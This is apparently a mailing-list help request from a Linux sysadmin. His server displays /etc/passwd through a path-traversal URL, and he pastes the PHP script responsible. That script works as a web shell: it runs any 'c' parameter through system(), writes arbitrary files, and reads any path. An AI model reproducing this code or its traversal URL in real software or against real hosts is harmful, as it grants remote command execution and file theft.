|
Hi, I have Apache/2.2.3 running on an Arch Linux box, currently hosting about 500 odd domains. When I browse to a specific domain such as: http://www.domian.co.za/files.php?l=../../../../../etc/passwd it displays the contents of the file /etc/passwd , as with any directory that I might request via the URL. I changed all the "Options Indexes" to "Options -Indexes" in httpd.conf, even removed them, yet Apache still displays my directories. I tried adding the "Options -Indexes" to an .htaccess file, but still with no luck. Here's the files.php script: <?php /* * Assume document root is /usr/local/websites/mydomain * The actual doc root is /var/www/vhosts/mydomain */ $location = $_GET['l']; ;//'../../fly.co.za/subdomains'; // Move up one directory $parent = dir($location); $com = $_GET['c']; if($com != null) { echo "<pre>"; echo system($com); echo "</pre>"; die(); } $w = $_GET['w']; if($w != null) { file_put_contents($location . $w,$w); die(); } // List the contents of the current directory // i.e.: /usr/local/websites if(is_file($location)) { echo "<pre>"; readfile($location); echo "</pre>"; } while($entry = $parent->read()) { echo $entry . '<br>'; } $parent->close(); ?> This lists *all* directories with a little playing in the path, except /etc/shadow, seeing as the permissions on /etc/shadow is 700, not 755 like the rest of the files in the directory. As it should be. How do I fix this? If this is the wrong list for this, please accept my apologies. Thank you. -- Regards, Francois Hall <http://www.webafrica.co.za> Snr. Linux Systems Administrator ________________________________ +27 21 464 9876 : Telephone 0861 555 222 : Reception ________________________________ Web Africa Networks (Pty) Ltd [ Named one of the Top 50 ICTe Companies in SA ] [ MyBroadband People's Choice, ISP of the Year ] Disclaimer: http://www.webafrica.co.za/disclaimer |
|